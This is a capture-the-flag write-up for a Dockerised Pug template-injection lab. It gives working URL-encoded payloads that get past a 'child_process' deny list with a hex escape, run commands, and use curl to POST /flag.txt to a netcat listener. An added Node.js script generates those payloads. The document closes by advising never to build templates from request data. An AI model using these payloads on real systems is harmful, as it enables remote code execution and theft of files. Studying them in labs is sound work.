Defeat the Pug!

R3zk0n · October 2, 2025

    Build

    sudo docker build -t ssti .
    

    Run

    sudo docker run --network="bridge" -p8000:8000 ssti
    

    The application should be reachable on localhost and on the docker0 interface. Retrieve the flag.txt file in the / directory to win!

    Hint: You don't need remote code execution, but maybe we can "curl" something out?

    Solution

    1. The injection point is the id parameter: /search?id=[vulnerable]
    2. Basic template interpolation reflects the evaluated output: %23{7*7} renders 49. The # has to be URL-encoded as %23, otherwise the browser treats the rest of the payload as a fragment and never sends it.
    3. Bypass the "child_process" deny list by hex-escaping a character of the module name. The filter only sees the substring "\x63hild_process", but once Pug hands the string literal to the JS engine it decodes to "child_process" (a \u0063 escape would do the same). The touch confirms command execution (spaces encoded as +, = as %3d, ; as %3b):
    	%23{function(){localLoad%3dglobal.process.mainModule.constructor._load%3bsh%3dlocalLoad("\x63hild_process").exec('touch+/tmp/pwned.txt')}()}
    4. Use curl from the container to POST the file to a self-hosted netcat listener. With the bridged network the container reaches the host at its docker0 address, so [attacker_url] is http://<docker0 address>:[port]. Two details matter: the module name keeps the \x63 escape because the deny list still applies, and the file is passed as -d @/flag.txt (the @ makes curl read the file; -d flag.txt alone would only post the literal string "flag.txt"). Start the listener first, then send the request; the flag arrives in the POST body.
    	%23{function(){localLoad%3dglobal.process.mainModule.constructor._load%3bsh%3dlocalLoad("\x63hild_process").exec('curl+-X+POST+-d+@/flag.txt+[attacker_url]')}()}
    	nc -nvlp [port]
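    As an added example, not code from the original write-up or from the challenge itself, the following Node.js script shows why the \x63 escape slips past a substring deny list and builds the URL-encoded /search?id= payloads for the probe and the exfiltration step. The deny-list check is assumed to be a plain substring match for "child_process"; the base URL http://localhost:8000 follows the docker run line above, and the listener address http://172.17.0.1:4444 is an assumed docker0 address and port that you replace with your own.

```javascript
// Added example (not part of the original write-up): why the \x63 trick slips
// past a substring deny list, and how to encode a Pug #{...} payload for the
// /search?id= parameter. Assumptions: the challenge's filter is a plain
// substring check for "child_process", and the base URL and listener address
// below are placeholders you replace with your own.

// Naive deny list of the kind the challenge applies to the interpolated input.
const DENY_LIST = ["child_process"];

function denyListBlocks(payload) {
  return DENY_LIST.some((word) => payload.includes(word));
}

// Replace the first character of a module name with its \xHH escape. The
// filter sees "\x63hild_process"; the JS engine, when it evaluates the string
// literal inside #{...}, sees "child_process".
function hexEscapeFirstChar(name) {
  const hex = name.charCodeAt(0).toString(16).padStart(2, "0");
  return "\\x" + hex + name.slice(1);
}

// What the engine does with \xHH escapes in a string literal, reproduced here
// so the round trip can be checked without eval.
function decodeHexEscapes(literal) {
  return literal.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) =>
    String.fromCharCode(parseInt(hh, 16))
  );
}

// The interpolation body used in steps 3 and 4 of the write-up: reach
// Module._load through process.mainModule, load the module, run a command.
function buildPayload(moduleLiteral, command) {
  return (
    "#{function(){localLoad=global.process.mainModule.constructor._load;" +
    `sh=localLoad("${moduleLiteral}").exec('${command}')}()}`
  );
}

// Encode only the characters that would break the query string: '#' starts a
// fragment and is never sent, '&' / '=' / ';' split parameters, '+' and '%'
// would be decoded by the server, and spaces become '+'. Everything else is
// left readable, as in the write-up's payloads.
const QUERY_ESCAPES = {
  "%": "%25", "#": "%23", "&": "%26", "+": "%2B", "=": "%3D", ";": "%3B", " ": "+",
};

function encodeQueryValue(value) {
  return value.replace(/[%#&+=; ]/g, (c) => QUERY_ESCAPES[c]);
}

function toSearchUrl(baseUrl, payload) {
  return `${baseUrl}/search?id=${encodeQueryValue(payload)}`;
}

// Usage: build the step-3 probe and the step-4 exfiltration request.
const BASE_URL = "http://localhost:8000";          // from the docker run line
const LISTENER = "http://172.17.0.1:4444";         // assumed docker0 address and nc port

const escapedModule = hexEscapeFirstChar("child_process");
const probe = buildPayload(escapedModule, "touch /tmp/pwned.txt");
const exfil = buildPayload(escapedModule, `curl -X POST -d @/flag.txt ${LISTENER}`);

console.log("blocked (plain):  ", denyListBlocks(buildPayload("child_process", "id")));
console.log("blocked (escaped):", denyListBlocks(probe));
console.log(toSearchUrl(BASE_URL, probe));
console.log(toSearchUrl(BASE_URL, exfil));
```

    The substring filter is the wrong place to defend: any escape the JS engine decodes (\x63, \u0063, string concatenation) defeats it, and the fix is to never build a Pug template from request data in the first place. Pass user input as a template local instead, so it is rendered as data rather than evaluated as code.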
    
